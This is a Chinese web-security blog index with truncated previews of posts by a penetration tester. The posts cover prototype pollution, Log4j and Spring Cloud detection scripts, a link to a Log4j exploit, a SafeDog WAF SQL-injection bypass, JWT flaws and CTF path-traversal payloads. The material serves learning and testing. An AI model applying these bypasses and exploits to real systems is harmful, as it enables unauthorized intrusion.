WEB安全
文章平均质量分 50
weixin_48170459
渗透测试工程师,业余coser,自由旅行爱好者
展开
-
原型污染漏洞分析
在说原型污染漏洞之前,我们先说一下什么是原型。JavaScript 中的每个对象都链接到某种对象,称为其原型。默认情况下,JavaScript 会自动为新对象分配一个内置的全局原型。按我的理解,可以把原型理解为父类,JavaScript声明一个对象类时,这个对象类会继承一个父类。对象会自动继承其分配的原型的所有属性,除非它们已经具有具有相同键的属性。__proto__是对象都有一个特殊属性,可用于访问其原型,可以使用中括号或点表示法进行访问。我们创建一个字符串,通过__proto__可以访问到myObje原创 2022-12-05 22:39:52 · 520 阅读 · 0 评论 -
攻防演练复盘
最近参加了为期两周的攻防演练,也是第一次参加攻防相关的活动,感觉跟平时的区别挺大的。刚到现场的时候说主要做蓝队方面的工作,但甲方资产方面什么的都不清楚,所以第一时间向甲方要了一份资产表,并了解资产在网络区域的分布情况,不过具体有多少资产,可能甲方那里都搞不清楚。复盘:1,了解资产的发布情况和网络拓扑图感觉这是很重要的一点,可以确定攻击方打进那个位置,如果资产什么的不确定,被偷家了都不知道。2,分析威胁日志时多看带有cookie,session,token,refer的信息一般攻击队打不进的时候,原创 2022-06-25 17:12:54 · 424 阅读 · 0 评论 -
Spring Cloud Function SpEL表达式注入漏洞批量检测脚本
仅可检测出网和ping命令可执行主机import requestsurl="http://dnslog.cn/getdomain.php"url1="http://dnslog.cn/getrecords.php"file=input("请输入url文件保存路径:");#"C:\\Users\\ASUS\\Desktop\\ces1.txt";with open(file,"r") as file1: for i in file1.readlines(): header =原创 2022-03-30 11:32:45 · 3475 阅读 · 0 评论 -
修改dirsearch—增加个小功能
这次修改dirsearch的原因呢,是因为在渗透测试过程中发现,一扫目录,发现结果为额,这还咋扫啊本来想把202状态给过滤掉,但想了想万一202状态有其他信息岂不是也过滤了,然后想把18KB的包给过滤了,结果,,,dirsearch没有这个功能。不过有–exclude-texts,过滤掉包含指定字符串的响应包功能,但想着以后要是也出现这种情况,还要抓包找特定字符串也挺麻烦的,所以就给dirsearch增加个过滤指定大小的包的功能。下面是结果演示敲下 python dirsearch.py -h 可看到原创 2022-01-06 21:15:15 · 3701 阅读 · 0 评论 -
Apache Log4j任意代码执行漏洞EXP(任意命令执行 window和Linux)
声明:本程序仅教学使用,由于使用本程序攻击网站所造成的后果由读者本人承担百度云链接:https://pan.baidu.com/s/1cB2ffoWiVti3Ve_ZM73-cA提取码:nexu仅测试Linux版本,Windows未测试,服务占用端口为8100和1389,个人推荐使用模式1测试环境:java:版本python版本需要的python包测试网站环境:Linux使用方法:1,运行 javac test1.java编译程序2,java test1 运行程序本程序有两种模式原创 2021-12-13 22:16:37 · 5267 阅读 · 2 评论 -
Apache Log4j任意代码执行高危漏洞远程批量检测脚本(脚本为初版,未经过测试)
连续工作了十二天,本来想着周五能轻松一点,结果来了这个漏洞,要检测一大批资产,看了一下复现方法,然后写了个脚本检测,利用dnslog回显检测,不过只是单纯post和get payload而已。然后,,,扫不出来,只能手工了。后续有环境在修改,读者也可自行修改,循环遍历一下参数字典。import requestsfrom urllib.parse import quoteurl="http://dnslog.cn/getdomain.php"url1="http://dnslog.cn/getreco原创 2021-12-10 17:30:17 · 2464 阅读 · 0 评论 -
资产收集—爬取百度搜索URL脚本
谷歌语法在收集资产这方面挺有用的,于是手撸了爬取百度URL脚本,后续和AWVSapi脚本联动实现自动化挖洞代码完整截图:使用方法:第一步输入爬取的页数,这里演示的是爬取5页第二步输入百度搜索的字符串,这里爬取163.com的子域名第三步输入保存文件名称,这里是www.txt爬取的局部URL代码解析:该代码采用的是单线程,如果想爬取速度快一点可以自行改为多线程百度搜索有爬虫检测机制,所以要定制headersearch为要搜索的字符串,因为百度搜索的字符串经过了URL编码,所以我们也编码一原创 2021-11-14 15:18:24 · 877 阅读 · 1 评论 -
JWT的安全问题
本文主要讨论JWT的安全问题,因水平有限,可能有些安全方面没有涉及到,欢迎各位师傅在评论区留言补充JWT(JSON Web Token)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。JWT的组成它由三部分组成,头部、载荷与签名通常如下所示xxxx.yyyy.zzzz头部alg表示了该jwt所使用的签名算法typ表示格式载荷载荷一般记载角色的权限信息,iat表示创建时间原创 2021-09-13 17:56:58 · 2692 阅读 · 0 评论 -
WebGoat的Authentication Bypasses关卡源码解析
在做这一道题的时候发现当我们把两个变量从命名后就可以bypass了,如下图所示但是不知道原理是什么,所以从github下载源码,来审计一下。https://github.com/WebGoat/WebGoat/releases/tag/v8.2.1定位到该模块的位置,第一个是账号验证功能模块,第三个是验证账号模块,我们打开第三个,定位到收到请求后的响应模块首先创建了AccountVerificationHelper对象,接下来调用了parseSecQuestions方法可以看到parse.原创 2021-09-10 18:52:31 · 422 阅读 · 0 评论 -
安全狗(4.0.30255)最新版sql注入 bypass
唉,fuzz了好久才fuzz出来的写个记录安全狗版本测试平台:dvwa常规注入1’ and ‘1’='1,直接被拦截将空格替换成/*//*/–%0e%0a即可绕过,函数绕过,如database()可换成database/*//*/–%0e%0a()绕过判断注入点错误条件无内容显示判断字段联合表查询...原创 2021-08-27 11:53:26 · 178 阅读 · 0 评论 -
对某非法cms进行代码审计
今天对某(SQ)cms进行代码审计审计工具:rips输入代码文件路径,点击scan进行扫描,发现的两个漏洞,一个是任意代码写入,另一个是文件包含。第一个漏洞,从上面的图片看,它把提交的数据直接拼接到文件内容,再写入到boos.php。我们打开第一个漏洞所在的代码文件,看看有没有其他过滤条件。这是$_POST[‘username’]第一次出现的位置,判断这个变量是否存在。继续跟踪,可以看到第二次出现的位置就直接拼接到文件内容里面去了,然后就直接写到文件里面去,并没有任何过滤。接着我们把漏洞原创 2021-08-02 22:21:04 · 152 阅读 · 0 评论 -
BUUCTF WEB刷题记录
第一题刚打开的页面看源码,发现source.php访问source.php我们要用file参数带出flag,但是有白名单限制。第一个判断是对file本身的值进行判断,第二个和第三个是对?前面的file值进行判断,所以我们可以从第二个和第三个入手。构造file值为source.php?../…/…/…/…/…/…/…/…/…/…/flag(要进行URL编码)额,啥都没有,换成etc/passwd试试没有flag。然后发现代码白名单有个hint.php,访问一下看看好吧,找到flag原创 2021-06-13 16:42:54 · 257 阅读 · 0 评论